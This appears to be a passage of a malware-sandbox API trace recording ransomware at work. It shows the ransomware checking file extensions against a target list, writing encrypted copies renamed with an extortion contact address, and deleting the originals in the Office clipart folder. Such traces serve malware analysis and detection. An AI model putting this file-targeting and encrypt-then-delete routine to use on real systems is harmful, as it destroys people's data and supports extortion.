lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 68 [0065.201] lstrlenW (lpString=".1cd") returned 4 [0065.201] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 68 [0065.201] lstrlenW (lpString=".jpg") returned 4 [0065.201] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.201] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.201] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01179_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0065.202] GetLastError () returned 0x0 [0065.202] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x7e8, lpOverlapped=0x0) returned 1 [0065.278] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x7f0, lpOverlapped=0x0) returned 1 [0065.279] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.279] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.279] SetEndOfFile (hFile=0x368) returned 1 [0065.280] CloseHandle (hObject=0x368) returned 1 [0065.280] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.280] SetEndOfFile (hFile=0x350) returned 1 [0065.281] CloseHandle (hObject=0x350) returned 1 [0065.282] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.282] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01179_.wmf")) returned 1 [0065.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 68 [0065.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 68 [0065.282] lstrlenW (lpString=".doc") returned 4 [0065.282] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.282] lstrlenW (lpString=".docx") returned 5 [0065.282] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.283] lstrlenW (lpString=".pdf") returned 4 [0065.283] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.283] lstrlenW (lpString=".xls") returned 4 [0065.283] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.283] lstrlenW (lpString=".xlsx") returned 5 [0065.283] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.283] lstrlenW (lpString=".ppt") returned 4 [0065.283] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 68 [0065.283] lstrlenW (lpString=".zip") returned 4 [0065.283] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.283] lstrlenW (lpString=".rar") returned 4 [0065.283] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.283] lstrlenW (lpString=".bz2") returned 4 [0065.283] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.283] lstrlenW (lpString=".7z") returned 3 [0065.283] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 68 [0065.283] lstrlenW (lpString=".dbf") returned 4 [0065.283] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 68 [0065.283] lstrlenW (lpString=".1cd") returned 4 [0065.283] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 68 [0065.283] lstrlenW (lpString=".jpg") returned 4 [0065.283] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.284] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.284] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01186_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0065.284] GetLastError () returned 0x0 [0065.284] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x2174, lpOverlapped=0x0) returned 1 [0065.305] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2180, lpOverlapped=0x0) returned 1 [0065.306] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.306] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.306] SetEndOfFile (hFile=0x368) returned 1 [0065.306] CloseHandle (hObject=0x368) returned 1 [0065.307] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.307] SetEndOfFile (hFile=0x350) returned 1 [0065.308] CloseHandle (hObject=0x350) returned 1 [0065.308] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.309] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01186_.wmf")) returned 1 [0065.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 68 [0065.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 68 [0065.309] lstrlenW (lpString=".doc") returned 4 [0065.309] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.309] lstrlenW (lpString=".docx") returned 5 [0065.309] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.309] lstrlenW (lpString=".pdf") returned 4 [0065.309] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.309] lstrlenW (lpString=".xls") returned 4 [0065.310] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.310] lstrlenW (lpString=".xlsx") returned 5 [0065.310] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.310] lstrlenW (lpString=".ppt") returned 4 [0065.310] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 68 [0065.310] lstrlenW (lpString=".zip") returned 4 [0065.310] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.310] lstrlenW (lpString=".rar") returned 4 [0065.310] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.310] lstrlenW (lpString=".bz2") returned 4 [0065.310] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.310] lstrlenW (lpString=".7z") returned 3 [0065.310] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 68 [0065.310] lstrlenW (lpString=".dbf") returned 4 [0065.310] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 68 [0065.310] lstrlenW (lpString=".1cd") returned 4 [0065.310] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 68 [0065.310] lstrlenW (lpString=".jpg") returned 4 [0065.310] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.311] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.311] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01434_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0065.312] GetLastError () returned 0x0 [0065.312] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x384, lpOverlapped=0x0) returned 1 [0065.382] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x390, lpOverlapped=0x0) returned 1 [0065.382] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.382] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.382] SetEndOfFile (hFile=0x368) returned 1 [0065.389] CloseHandle (hObject=0x368) returned 1 [0065.396] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.396] SetEndOfFile (hFile=0x350) returned 1 [0065.400] CloseHandle (hObject=0x350) returned 1 [0065.404] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.404] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01434_.wmf")) returned 1 [0065.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 68 [0065.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 68 [0065.406] lstrlenW (lpString=".doc") returned 4 [0065.406] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.406] lstrlenW (lpString=".docx") returned 5 [0065.406] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.406] lstrlenW (lpString=".pdf") returned 4 [0065.406] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.406] lstrlenW (lpString=".xls") returned 4 [0065.406] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.406] lstrlenW (lpString=".xlsx") returned 5 [0065.406] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.406] lstrlenW (lpString=".ppt") returned 4 [0065.406] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 68 [0065.406] lstrlenW (lpString=".zip") returned 4 [0065.406] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.406] lstrlenW (lpString=".rar") returned 4 [0065.406] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.406] lstrlenW (lpString=".bz2") returned 4 [0065.406] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.406] lstrlenW (lpString=".7z") returned 3 [0065.406] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 68 [0065.407] lstrlenW (lpString=".dbf") returned 4 [0065.407] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 68 [0065.407] lstrlenW (lpString=".1cd") returned 4 [0065.407] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 68 [0065.407] lstrlenW (lpString=".jpg") returned 4 [0065.407] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.408] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.408] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01631_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0065.411] GetLastError () returned 0x0 [0065.411] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x228, lpOverlapped=0x0) returned 1 [0065.412] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x230, lpOverlapped=0x0) returned 1 [0065.413] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.413] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.413] SetEndOfFile (hFile=0x2c0) returned 1 [0065.413] CloseHandle (hObject=0x2c0) returned 1 [0065.414] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.414] SetEndOfFile (hFile=0x350) returned 1 [0065.415] CloseHandle (hObject=0x350) returned 1 [0065.415] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.415] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01631_.wmf")) returned 1 [0065.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 68 [0065.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 68 [0065.416] lstrlenW (lpString=".doc") returned 4 [0065.416] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.416] lstrlenW (lpString=".docx") returned 5 [0065.416] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.416] lstrlenW (lpString=".pdf") returned 4 [0065.416] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.416] lstrlenW (lpString=".xls") returned 4 [0065.416] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.416] lstrlenW (lpString=".xlsx") returned 5 [0065.416] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.416] lstrlenW (lpString=".ppt") returned 4 [0065.416] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 68 [0065.416] lstrlenW (lpString=".zip") returned 4 [0065.416] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.416] lstrlenW (lpString=".rar") returned 4 [0065.416] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.416] lstrlenW (lpString=".bz2") returned 4 [0065.416] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.416] lstrlenW (lpString=".7z") returned 3 [0065.416] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 68 [0065.416] lstrlenW (lpString=".dbf") returned 4 [0065.416] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 68 [0065.416] lstrlenW (lpString=".1cd") returned 4 [0065.416] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 68 [0065.416] lstrlenW (lpString=".jpg") returned 4 [0065.416] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.417] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.417] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01761_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0065.417] GetLastError () returned 0x0 [0065.417] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1034, lpOverlapped=0x0) returned 1 [0065.427] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1040, lpOverlapped=0x0) returned 1 [0065.428] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.428] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.428] SetEndOfFile (hFile=0x2c0) returned 1 [0065.430] CloseHandle (hObject=0x2c0) returned 1 [0065.431] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.431] SetEndOfFile (hFile=0x350) returned 1 [0065.434] CloseHandle (hObject=0x350) returned 1 [0065.434] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.434] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01761_.wmf")) returned 1 [0065.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 68 [0065.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 68 [0065.435] lstrlenW (lpString=".doc") returned 4 [0065.435] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.435] lstrlenW (lpString=".docx") returned 5 [0065.435] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.435] lstrlenW (lpString=".pdf") returned 4 [0065.435] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.435] lstrlenW (lpString=".xls") returned 4 [0065.435] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.435] lstrlenW (lpString=".xlsx") returned 5 [0065.435] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.435] lstrlenW (lpString=".ppt") returned 4 [0065.435] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 68 [0065.435] lstrlenW (lpString=".zip") returned 4 [0065.435] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.435] lstrlenW (lpString=".rar") returned 4 [0065.435] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.435] lstrlenW (lpString=".bz2") returned 4 [0065.435] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.435] lstrlenW (lpString=".7z") returned 3 [0065.435] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 68 [0065.435] lstrlenW (lpString=".dbf") returned 4 [0065.435] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 68 [0065.435] lstrlenW (lpString=".1cd") returned 4 [0065.436] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 68 [0065.436] lstrlenW (lpString=".jpg") returned 4 [0065.436] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.442] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.442] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00010_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0065.443] GetLastError () returned 0x0 [0065.443] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x566, lpOverlapped=0x0) returned 1 [0065.446] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x570, lpOverlapped=0x0) returned 1 [0065.447] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, 